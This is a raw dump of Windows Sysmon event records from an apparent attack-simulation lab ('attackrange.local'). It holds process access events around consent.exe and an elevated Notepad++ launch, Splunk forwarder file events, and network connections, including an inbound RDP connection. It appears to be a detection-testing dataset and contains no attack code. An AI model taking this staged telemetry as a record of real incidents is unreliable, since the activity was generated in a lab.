System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.336{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.335{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.335{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.335{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+2c4f|c:\windows\system32\appinfo.dll+4026|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+29cc|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.302{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1014c0C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\appinfo.dll+33d8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+29cc|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.286{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.286{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.286{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:08.455{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71240CCA47F17FD82D4078DFF493FD1,SHA256=CE4E27EA66D3931B63952A4A808AD59DDE96F528BF4A91B544EEB4A62C0E64F5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:08.087{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E7959A40B0E04E5FB4842B676872D4A,SHA256=033848965EBB6C8187089489FEB255BEC175F5F33858265C629C4E0338E92CCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:08.302{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A55AE63016C07F97D3CCF7789293058,SHA256=193635A11357A8C4C6D500CAE03A07ED866E7A020761A37C029CEB56EF8ED7F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:08.302{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DAD690BCC81A26D3A2A6463AD4DBDBA,SHA256=6081D3B1EDD7F2CFF87A4690256DC5993743A4FC253459E5D7A0072CA642EA56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:08.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2E2D2F5A05FF28A2954000C4D8DD74,SHA256=2AE75883CC2C6CAD82879E9F76061A5349AEE9BBEE2545A8B0DBD7033DA18920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:09.470{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B3824299EA12E7FDEDF047B1D174B27,SHA256=2AB288B0B1BF6D582E4A498958ADEA78B6A9C0CEB43739F0624051F881A4211A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:09.087{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B231E843ABA5F51AA96912C871710C0,SHA256=DE3C23886A9A54F33CD377ECC2DC544ECD0F6B97C1B79561DB7A5E6F240AFC4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:07.392{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57275-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:10.485{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43EF354A9B719957B77A50EEE48A1191,SHA256=A23921188F51E47A5390A13AD51CD873C620D1372881B37C0633CD2934E83660,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:10.103{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B24BB11EE0EECE83F87B8B49646EB3B0,SHA256=9BD230F5883E7901F8DD50BC178FC5B3AF4142B9134237C48DE40B873569B890,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.714{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51036-false10.0.1.12-8000- 23542300x80000000000000001049202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:11.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76CF61D6D26CDCDBE251BDC6E2F80CFF,SHA256=94334231E5C31C9526E612A7716DA870C6BFBB8B4FADF9AA456E43DA3327C2D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:11.134{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1085C77CD8D99DDF082B5AA517675DDE,SHA256=6AD9DC508509522821591EDCCD94C1552D5B83DB80B2CE9885A71121679D1F50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:12.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD1CAF5B18262FE1A2B00D7546A8FE5,SHA256=A64F755BD33B113D7881A1CEEA8D979F7542902728D9D1E5AF21AE03EA994C45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:12.150{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F7A1986EC2CE457D9FFF567738A5C26,SHA256=FD2D698434D3D93B66825270358AD152675010015967448C53DBD7A87D1EAF90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:13.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F16225B085D2F06F48A74243A37EF634,SHA256=C86AB8268077DA689BBD744DFF751268BE23F7F308CA4C17E42A1C1E30B34253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:13.166{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C51EC936927DA101D7D7FB34BAC6DCEA,SHA256=1E6A711F3BB126D973A86A6EFE61284CFE628BEDC8728E1DDC9D7AD00A86A7E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:14.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03B042CCFC51563C5084DF64E3C6F17B,SHA256=C3AA00E5F228F1F006480560F7FB48F3B273EDCF9FEE8F1E074B9E035A33AC4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:14.178{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C059995D22A32AE61873DDBF46BDF7C,SHA256=114E7DA54EEE21C032E197B30457DAFE99C5FF8C34F586AFB840B765D2D1C1DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:15.582{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E1FCF14E4F14A686DFE9A99E844F501,SHA256=1036374EDB94E73AA29000DE731E1A0829C004D8E514340EB1D04E086BA9C5DB,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000807705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:13.376{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57276-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:15.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9742C22682F68A742693D09261E4CFF8,SHA256=B61903F5F10C55EC71589CDF3186F239F839EC5618262AB049C7E0BEC8A07629,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:15.413{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D6A8596644251D852CF14C08D32EE44,SHA256=0F7AAFF03CE7FFB808DC06BA4287590DAEF48BA6EC81D1031469D1BFCE0673D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:15.413{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A55AE63016C07F97D3CCF7789293058,SHA256=193635A11357A8C4C6D500CAE03A07ED866E7A020761A37C029CEB56EF8ED7F4,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001049206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.609{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51037-false10.0.1.12-8000- 23542300x80000000000000001049212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:16.596{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CDA4024A8CC2CDC11470FE6BF7D1C3E,SHA256=3A11E9174EA35454452032031D658F9B882CF129E44A07898B258921B29C617A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:16.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29DDA18C2F17374DB9E61907002073E7,SHA256=CB16D6F921C91D16FDBDC632B7843A60AA346392067E21A2EB051A01ED764A8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.940{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51038-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001049210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.940{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT 
AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51038-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x8000000000000000807710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:17.428{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E921234677B48FFF6322965F6F8F522,SHA256=8F1D945BFEB066AC11C16A017C962834D39B7FD237F3FAE6B5F41AFC09B61666,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:17.428{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D76FB3DBADC00E25088C500A5A9DF068,SHA256=0C4868C2C30D1DD4405385D301DB74D795BED4AD2CAC25C587C50FD7AE86637F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:15.855{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-29373-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:17.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=359F9D555FE7E3AE32B24564F9CC7E48,SHA256=FBA59D44256AB0B39C389EA7999D9A2EB203FFF41BC204958C7868BB71E9AD02,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001049232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.948{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.948{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
